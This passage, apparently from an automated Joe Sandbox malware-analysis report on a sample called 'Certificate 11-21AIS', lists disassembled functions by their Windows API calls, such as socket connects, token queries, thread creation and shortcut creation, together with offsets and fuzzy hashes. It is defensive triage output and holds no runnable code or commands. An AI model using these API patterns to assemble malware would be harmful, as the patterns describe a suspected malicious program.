                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleep$RectWindow
                                                                              • String ID:
                                                                              • API String ID: 3382505437-0
                                                                              • Opcode ID: c4ba2137df1ca661082546a7e87159434c9331e42f4764a92fcbf46131d7723e
                                                                              • Instruction ID: 1d3702e4ef5b51b2f18f97cdde4d4a7a4935ac08204089e75351f0de5a161c03
                                                                              • Opcode Fuzzy Hash: c4ba2137df1ca661082546a7e87159434c9331e42f4764a92fcbf46131d7723e
                                                                              • Instruction Fuzzy Hash: 4131BA7590421DEBDB04CFB8D949AAE3BB5FB05319F104229FA25EA2D1C3B09914DB91
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 008FDBD7
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008FDBF4
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008FDC2C
                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008FDC52
                                                                              • _wcsstr.LIBCMT ref: 008FDC5C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                              • String ID:
                                                                              • API String ID: 3902887630-0
                                                                              • Opcode ID: 2bdd8176f9e95b7e01bf395f2a359eb85cff039a8aaa77e218803f89efcecd28
                                                                              • Instruction ID: 00713020331bd9ce723ca526fd0e9ae59fb546932a78da1b216d3afae1be0ce7
                                                                              • Opcode Fuzzy Hash: 2bdd8176f9e95b7e01bf395f2a359eb85cff039a8aaa77e218803f89efcecd28
                                                                              • Instruction Fuzzy Hash: A5212C71204248BBEB159F399C49E7B7BA9FF46750F104039FB09CA251DAA1CC41E660
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008FBC90
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008FBCC2
                                                                              • __itow.LIBCMT ref: 008FBCDA
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008FBD00
                                                                              • __itow.LIBCMT ref: 008FBD11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: 143b66e9a1780004792557894b807423251621bab49568e65f94ca18deaad187
                                                                              • Instruction ID: 452db7e456af57513499eb1fd0856b1a0c30178942d8e7b65e0bdd7e66656100
                                                                              • Opcode Fuzzy Hash: 143b66e9a1780004792557894b807423251621bab49568e65f94ca18deaad187
                                                                              • Instruction Fuzzy Hash: B521997570061CBADB11AA79CC46FEF7A68FF5A710F001025FB05EB181EB70D94587A2
                                                                              APIs
                                                                                • Part of subcall function 008C50E6: _wcsncpy.LIBCMT ref: 008C50FA
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,009060C3), ref: 00906369
                                                                              • GetLastError.KERNEL32(?,?,?,009060C3), ref: 00906374
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009060C3), ref: 00906388
                                                                              • _wcsrchr.LIBCMT ref: 009063AA
                                                                                • Part of subcall function 00906318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009060C3), ref: 009063E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                              • String ID:
                                                                              • API String ID: 3633006590-0
                                                                              • Opcode ID: 1f3be90d9d76cffe92c6686f86abc9764250c9cc3afab35070d6c228b5b76efa
                                                                              • Instruction ID: 75e1d6e94bba7d4aaa449de61c8e3af4a1e8062600f9151ed7f9e042a5aec4e5
                                                                              • Opcode Fuzzy Hash: 1f3be90d9d76cffe92c6686f86abc9764250c9cc3afab35070d6c228b5b76efa
                                                                              • Instruction Fuzzy Hash: A82127355152159FDB25EB7CAC42FEA33ACFF06360F10046AF145C31C1EBA0D9909AE5
                                                                              APIs
                                                                                • Part of subcall function 0091A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0091A84E
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00918BD3
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918BE2
                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00918BFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 3701255441-0
                                                                              • Opcode ID: 0c60c62926544db82a04b2e1de92399e046008471b7c638978a2092ca6dadfa3
                                                                              • Instruction ID: 5c2f1cb2ef91937edc655e194a87f90f8df1d8edd542291d30746c1cec42ffc5
                                                                              • Opcode Fuzzy Hash: 0c60c62926544db82a04b2e1de92399e046008471b7c638978a2092ca6dadfa3
                                                                              • Instruction Fuzzy Hash: 69219D753402149FCB10AB68C885FBE77A9EF49710F044559F946EB392CB74AC419B92
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00918441
                                                                              • GetForegroundWindow.USER32 ref: 00918458
                                                                              • GetDC.USER32(00000000), ref: 00918494
                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 009184A0
                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 009184DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: 073fe46f2c8aed2fe70f85643d0bde5d94ba4166c4a2ad00f64081fb27134e7f
                                                                              • Instruction ID: a634fdd3560e98246e2e26cbb50d27323fe8ff8ebd262d7b87cca0640b9626bf
                                                                              • Opcode Fuzzy Hash: 073fe46f2c8aed2fe70f85643d0bde5d94ba4166c4a2ad00f64081fb27134e7f
                                                                              • Instruction Fuzzy Hash: 74216F7AB01204AFD700EFA4DC85EAEBBF5EF49301F048479E85997291DA70AC40DB60
                                                                              APIs
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008DAFE3
                                                                              • SelectObject.GDI32(?,00000000), ref: 008DAFF2
                                                                              • BeginPath.GDI32(?), ref: 008DB009
                                                                              • SelectObject.GDI32(?,00000000), ref: 008DB033
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: de260c14b2a252b42f5094dbc548719287a123a46f8ce199696c59c31ad2ae87
                                                                              • Instruction ID: 5bcba93299c056ae95cfcb964754221342362c3a429d71d6f28a7662c1e7a91b
                                                                              • Opcode Fuzzy Hash: de260c14b2a252b42f5094dbc548719287a123a46f8ce199696c59c31ad2ae87
                                                                              • Instruction Fuzzy Hash: 5121AFB5828209EFDB219F55EC48B9A7B6CFB10395F24431AE460D23A0E3708842EF91
                                                                              APIs
                                                                              • __calloc_crt.LIBCMT ref: 008E21A9
                                                                              • CreateThread.KERNEL32(?,?,008E22DF,00000000,?,?), ref: 008E21ED
                                                                              • GetLastError.KERNEL32 ref: 008E21F7
                                                                              • _free.LIBCMT ref: 008E2200
                                                                              • __dosmaperr.LIBCMT ref: 008E220B
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                              • String ID:
                                                                              • API String ID: 2664167353-0
                                                                              • Opcode ID: 6f6a2d89a6bb7f82960afdb64bd7a7fb19547bf3e45a2aba7736ebc90bba1e8f
                                                                              • Instruction ID: 8203bc5fb4e04a760e268ddcf756286945fa2b695002b4d89815c66af49953b6
                                                                              • Opcode Fuzzy Hash: 6f6a2d89a6bb7f82960afdb64bd7a7fb19547bf3e45a2aba7736ebc90bba1e8f
                                                                              • Instruction Fuzzy Hash: 6D11E5321083C6AFDB11AF6A9C41D6B7B9CFF03774B100529FA14C6181EB71D81196A2
                                                                              APIs
                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 008FABD7
                                                                              • GetLastError.KERNEL32(?,008FA69F,?,?,?), ref: 008FABE1
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,008FA69F,?,?,?), ref: 008FABF0
                                                                              • HeapAlloc.KERNEL32(00000000,?,008FA69F,?,?,?), ref: 008FABF7
                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 008FAC0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 842720411-0
                                                                              • Opcode ID: cbf93254b510fc29eb8be81902a685e9600c51dcb22cd18047bc8589e3500cbd
                                                                              • Instruction ID: d34c6e0afaa4108e9fd93ca4846ad654b3f5d48fb6514142943d87bd75e43c3a
                                                                              • Opcode Fuzzy Hash: cbf93254b510fc29eb8be81902a685e9600c51dcb22cd18047bc8589e3500cbd
                                                                              • Instruction Fuzzy Hash: A5013CB9215208BFDB144FB9DC48DAB3BADFF8A7657100469F949C3260DA71DC40DB61
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32 ref: 008F9ADC
                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 008F9AF7
                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 008F9B05
                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 008F9B15
                                                                              • CLSIDFromString.OLE32(?,?), ref: 008F9B21
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3897988419-0
                                                                              • Opcode ID: 942d1a807e1f7fd320fb59eb773daea56c058600541e69692ea08aa763119969
                                                                              • Instruction ID: aac14db5e2085806d8b14881d47c3a1e68e0839f8cfac0879a216707cd3e1b2f
                                                                              • Opcode Fuzzy Hash: 942d1a807e1f7fd320fb59eb773daea56c058600541e69692ea08aa763119969
                                                                              • Instruction Fuzzy Hash: 02018F7A611229BFDB114F64EC44FBE7AEDEB45361F144024FA45D2210E770DD40ABA0
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907A74
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00907A82
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00907A8A
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00907A94
                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907AD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: a32cdfba7bff7946487e30b835b6cf7369f8897b4e3818275d00a340a5617c95
                                                                              • Instruction ID: e60ac0ceae1c8cd987c54e7ad3205570175dcc596dcc97f2a98896fd02c07a85
                                                                              • Opcode Fuzzy Hash: a32cdfba7bff7946487e30b835b6cf7369f8897b4e3818275d00a340a5617c95
                                                                              • Instruction Fuzzy Hash: 04012D79E19619DFDF04AFE4DC48ADDFB78FB0D721F000555D902B2290DB34AA509BA1
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008FAADA
                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008FAAE4
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008FAAF3
                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008FAAFA
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008FAB10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: f8248c9337170dce2392e7dc17cb6c25f09e351830d0d12d7935ba0fd8d51561
                                                                              • Instruction ID: 5d492d0fdfb74167d2c7c8a9e59124e77044f3304b7764ff2cdf8f8c556ff5bb
                                                                              • Opcode Fuzzy Hash: f8248c9337170dce2392e7dc17cb6c25f09e351830d0d12d7935ba0fd8d51561
                                                                              • Instruction Fuzzy Hash: D4F062793152086FEB150FB4EC88E7B3B6DFF4A764F000029FA45C7190CA609C01DB61
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008FAA79
                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008FAA83
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008FAA92
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008FAA99
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008FAAAF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: c2577dbe8b3a71d19b561d912c83d407d6e1bcdd7ae2490962ab0225e46fa70e
                                                                              • Instruction ID: d8c3b6ff2bdffceb99e5711bba3d3ed92365d7cf902cf0a9f5f3877cfc2763b7
                                                                              • Opcode Fuzzy Hash: c2577dbe8b3a71d19b561d912c83d407d6e1bcdd7ae2490962ab0225e46fa70e
                                                                              • Instruction Fuzzy Hash: 95F0AF792152186FEB141FA4AC88E7B3BACFF4A7A4F000019FA05C7190DA609C05DA61
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 008FEC94
                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 008FECAB
                                                                              • MessageBeep.USER32(00000000), ref: 008FECC3
                                                                              • KillTimer.USER32(?,0000040A), ref: 008FECDF
                                                                              • EndDialog.USER32(?,00000001), ref: 008FECF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: fa5d0c1d30e379f0d7a59da8459eaeb2ac3b2c42ba0022f08efb34046d3ae295
                                                                              • Instruction ID: 73cf2986581ce9d10679d8251f7ecc58a020fbdc7b3986b8f21d67cfc55cadb0
                                                                              • Opcode Fuzzy Hash: fa5d0c1d30e379f0d7a59da8459eaeb2ac3b2c42ba0022f08efb34046d3ae295
                                                                              • Instruction Fuzzy Hash: EE01D6385207589BEB205F20DE4EFA67778FF00709F00055DB642E10E0DBF0AA44CB50
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 008DB0BA
                                                                              • StrokeAndFillPath.GDI32(?,?,0093E680,00000000,?,?,?), ref: 008DB0D6
                                                                              • SelectObject.GDI32(?,00000000), ref: 008DB0E9
                                                                              • DeleteObject.GDI32 ref: 008DB0FC
                                                                              • StrokePath.GDI32(?), ref: 008DB117
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: 58fd518d942401c7e7e98c021de5cb42bff50911b59817776af6f4d195f84d94
                                                                              • Instruction ID: e585603f73cc5c6e0e685443afa5bb01e734362222bf3d51ee7caaa0619dbf12
                                                                              • Opcode Fuzzy Hash: 58fd518d942401c7e7e98c021de5cb42bff50911b59817776af6f4d195f84d94
                                                                              • Instruction Fuzzy Hash: CEF01938029648EFDB259F65EC0CB543B68FB017A6F188315E4A5852F0D7318956EF50
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 0090F2DA
                                                                              • CoCreateInstance.OLE32(0094DA7C,00000000,00000001,0094D8EC,?), ref: 0090F2F2
                                                                              • CoUninitialize.OLE32 ref: 0090F555
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                              • String ID: .lnk
                                                                              • API String ID: 948891078-24824748
                                                                              • Opcode ID: 2b2e5d1ab9ebac44e9e835a6a2a61aeeef4bd74cc9c6ec1a5ef7ea5ead159147
                                                                              • Instruction ID: ee2afe0b4e7f38f29c538d0d88861a1f802a6ef85a406bf251a6e00e0fbc264b
                                                                              • Opcode Fuzzy Hash: 2b2e5d1ab9ebac44e9e835a6a2a61aeeef4bd74cc9c6ec1a5ef7ea5ead159147
                                                                              • Instruction Fuzzy Hash: 54A10971104201AFD300EF68C895EABB7A8FF99714F004A5DF595D7292EB70EA49CB92
                                                                              APIs
                                                                                • Part of subcall function 008C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C53B1,?,?,008C61FF,?,00000000,00000001,00000000), ref: 008C662F
                                                                              • CoInitialize.OLE32(00000000), ref: 0090E85D
